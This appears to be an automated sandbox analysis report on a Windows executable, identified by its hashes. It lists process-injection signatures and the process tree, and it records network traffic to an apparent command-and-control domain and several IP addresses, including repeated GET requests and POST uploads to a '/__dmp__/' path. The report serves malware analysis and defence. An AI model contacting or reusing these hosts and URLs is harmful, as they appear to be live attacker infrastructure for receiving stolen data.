Analysis

  • max time kernel
    93s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/11/2022, 09:46 UTC

General

  • Target

    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe

  • Size

    1.3MB

  • MD5

    1124d58ea7989a4d9567d8568843aa97

  • SHA1

    a8c62451adc5e56d1019cd864e6edfa8b0e012b0

  • SHA256

    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541

  • SHA512

    1fa28243304e206ee6c5384efcb3a0b7bbe3f10687b92534de3ebe72483177d258652f25ac7eed20ad72c89237e5238ab4657f52131ec40d5f25997ba50e8b48

  • SSDEEP

    24576:zrKqlGCPcJKwybUDwEZZODYmR9G+gnbkk6XRJfe3DqYO/KpLwFfngWX4VmJPak+:zrKo4ZwCOnYjVmJPa1

Score
5/10

Malware Config

Signatures

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    "C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe"
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
      (child of PID 4024)
      • Suspicious use of SetWindowsHookEx
      PID:4232

Network

  • flag-unknown
    DNS
    yhe3i1xa553vtww.0roptbgg23.com
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    8.8.8.8:53
    Request
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    Response
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    5.79.71.205
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    5.79.71.225
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    85.17.31.82
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    85.17.31.122
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.202
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.211
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.226
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.217.107
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    POST
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    POST /__dmp__/ HTTP/1.1
    User-Agent: dBrowser 1 CallGetResponse:1
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Content-Length: 1291
    Cache-Control: no-cache
  • flag-unknown
    DNS
    226.101.242.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.101.242.52.in-addr.arpa
    IN PTR
    Response
  • flag-unknown
    POST
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    POST /__dmp__/ HTTP/1.1
    User-Agent: session
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Content-Length: 3775
    Cache-Control: no-cache
  • 13.69.239.74:443
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    260 B
    5
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    1.8kB
    265 B
    7
    6

    HTTP Request

    POST http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
  • 8.247.211.254:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    4.3kB
    345 B
    9
    8

    HTTP Request

    POST http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
  • 8.8.8.8:53
    yhe3i1xa553vtww.0roptbgg23.com
    dns
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    76 B
    204 B
    1
    1

    DNS Request

    yhe3i1xa553vtww.0roptbgg23.com

    DNS Response

    5.79.71.205
    5.79.71.225
    85.17.31.82
    85.17.31.122
    178.162.203.202
    178.162.203.211
    178.162.203.226
    178.162.217.107

  • 8.8.8.8:53
    226.101.242.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    226.101.242.52.in-addr.arpa

MITRE ATT&CK Matrix

Downloads

  • memory/4232-133-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-134-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-135-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-136-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-137-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-138-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB
